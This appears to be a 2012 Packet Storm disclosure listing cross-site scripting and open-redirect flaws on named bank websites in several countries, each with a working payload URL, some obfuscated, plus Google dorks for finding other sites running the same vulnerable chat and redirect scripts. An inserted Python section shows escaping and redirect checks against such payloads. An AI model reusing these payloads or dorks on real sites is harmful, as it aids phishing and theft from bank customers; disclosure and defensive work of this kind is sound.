Various Banks Cross Site Scripting

2012-03-21T00:00:00
ID PACKETSTORM:111068
Type packetstorm
Reporter Sony
Modified 2012-03-21T00:00:00

Description

                                        
                                            `# Title: Some bank websites that suffer from Cross-site scripting  
vulnerabilities.  
# Author: Sony and Flexxpoint  
# Date: 21.03.2012  
# Sony Blog: http://st2tea.blogspot.com  
# Flexxpoint Blog : http://flexxpoint.blogspot.com/  
# Site: http://insecurity.ro  
  
  
  
We staged an experiment out of interest. We looked through several randomly  
selected websites of the world's banks to check them for vulnerabilities. This  
was done rather quickly, even without any specialized software. The results  
were not surprising. We will demonstrate different bugs of the same type.  
  
Demo:  
  
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://insecurity.ro  
  
Open redirect in Bitrix (Google dork):  
  
inurl:bitrix/rk.php  
  
  
http://www.citizensbank.com/  
(U.S.)  
  
Simple (in the Search)  
  
http://www.citizensbank.com/search/?query=Secure%20Plan%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s1600/citiz.JPG  
  
  
https://www.wellsfargo.com/  
(U.S.)  
  
http://codepad.org/inXkWxYw  
  
http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s1600/well.JPG  
  
  
http://www.eximb.com  
(Ukraine)  
  
http://www.eximb.com/rus/personal/everyday/internet_banking/?f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s1600/ukr.JPG  
  
  
http://procreditbank.bg/main/bg/index.php  
(Bulgaria)  
  
https://probanking.procreditbank.bg/regist/default.asp?password2=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E  
  
http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s1600/bg.JPG  
  
http://www.vtb24.ru  
(Russia)  
  
http://www.vtb24.ru/news/Pages/nizhnij-tagil.aspx?year=2012&category=%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s1600/vtb24.JPG  
  
http://www.homecredit.ru/  
(Russia)  
  
https://online.homecredit.ru/ChatApp/login.jsp  
  
or..  
  
https://online.homecredit.ru/ChatApp/Chat/HtmlChatFrameSet.jsp  
  
We have an HTML code injection in the chat.  
  
http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s1600/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG  
  
http://www.mastercardpremium.ru  
(Russia; not an official site, but good for an XSS phishing attack)  
  
Simple.  
  
http://www.mastercardpremium.ru/search?phrase=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s1600/master.JPG  
  
  
http://www.raiffeisen.ch/web/home_de  
(Switzerland)  
  
http://www.raiffeisen.ch/raiffeisen/internet/rb0027.nsf/fAskForDeletionFile?ReadForm&File=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E  
  
http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s1600/1a.JPG  
  
http://boerse.raiffeisen.ch/raiffeisen2/listings/intraday.jsp?listing=998089,4,1&name=SM%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E  
  
http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s1600/2a.JPG  
  
  
http://www.uwcfs.com/  
(Czech Republic)  
  
XSS in the chat. The same chat software is also used on:  
  
http://www1.migbank.com/  
  
https://www.msufcu.org/  
  
Google Dorks: inurl:/phplive/message_box.php?theme=  
  
One bug = a lot of websites.  
  
https://secure.moneypolo.cz/phplive/message_box.php?theme=&l=admin&x=1&deptid=1%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s1600/internetbank.JPG  
  
  
http://www.bcb.gob.bo/index.php  
(Bolivia)  
(works only in old Internet Explorer versions and IE-based browsers such as Maxthon, Green, etc.)  
  
http://www.bcb.gob.bo/index.php?q=%22%20stYle=%22x:expre/**/ssion%28alert%28/XSS/.source%29%29%20&combos1_1=1&combos1_2=1&combos1_3=1&combos1_4=1&combos1_5=1&combos1_6=1&combos1_7=1&combos1_8=1&combos1_9=1&subcateg1=1&Submit=Buscar  
  
http://img29.imageshack.us/img29/4543/screenshot2232012.png  
  
  
http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s1600/bolivia.JPG  
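An added, defender-side example, not code from the original advisory: it renders a search term into the two contexts the reports above reflect into (an HTML attribute plus the page body, and a JavaScript string literal) both naively and with context-correct encoding, parses the result to show which tags and attributes a browser would actually see, and adds a same-site check for a goto= redirect parameter like the Bitrix one. All inputs are constructed stand-ins for the payload shapes on this page, and the function names are my own.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed inputs modelled on the payload shapes seen above (not the page's own).
SEARCH_PAYLOAD = 'Secure Plan""><script>alert("Cross Site Scripting")</script>'
STYLE_PAYLOAD = '" style="x:expression(alert(1))'
JS_PAYLOAD = "'; alert(1)//</script>"

def render_search_unsafe(query):
    # The search term is reflected verbatim into an attribute and the body.
    return f'<input value="{query}"><p>Results for {query}</p>'

def render_search_safe(query):
    # html.escape(quote=True) encodes & < > " ' so the term can neither close
    # the attribute nor open a tag, whichever of the two contexts it lands in.
    q = html.escape(query, quote=True)
    return f'<input value="{q}"><p>Results for {q}</p>'

def render_js_unsafe(value):
    return f"<script>var f = '{value}';</script>"

def render_js_safe(value):
    # json.dumps gives a quoted JS literal; "<" -> \u003c keeps "</script>" in the data inert.
    lit = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var f = {lit};</script>"

class _Inventory(HTMLParser):
    # Collects every tag name and attribute name a browser would parse.
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = set(), set()
    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)
        self.attrs.update(name for name, _ in attrs)

def inventory(markup):
    p = _Inventory()
    p.feed(markup)
    p.close()
    return p.tags, p.attrs

def is_local_redirect(target):
    # Check for a "goto="-style parameter: accept only same-site paths and
    # reject absolute URLs, scheme-relative "//host" and backslash variants.
    u = urlsplit(target)
    return (target.startswith("/") and not target.startswith("//")
            and "\\" not in target and not u.scheme and not u.netloc)
```

Run `inventory()` on both renderings of each payload: the naive ones yield a `script` tag or a `style` attribute, the encoded ones only `input`, `p` and `value`.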
  
  
We would like to add a few words about security. There's no need to panic;  
perfect security just isn't possible, though we should try to come as close  
as possible. We would like to give a couple of pieces of advice to these banks.  
They should certainly pay more attention to their IT personnel's competence  
and discipline, spend their money not only on market research but also on  
penetration testing, organize penetration testers' contests like Google and  
Facebook do, or possibly have their own staff of penetration testers. The  
bank personnel should be tested for their vulnerability to social  
engineering. These are just the basics.  
`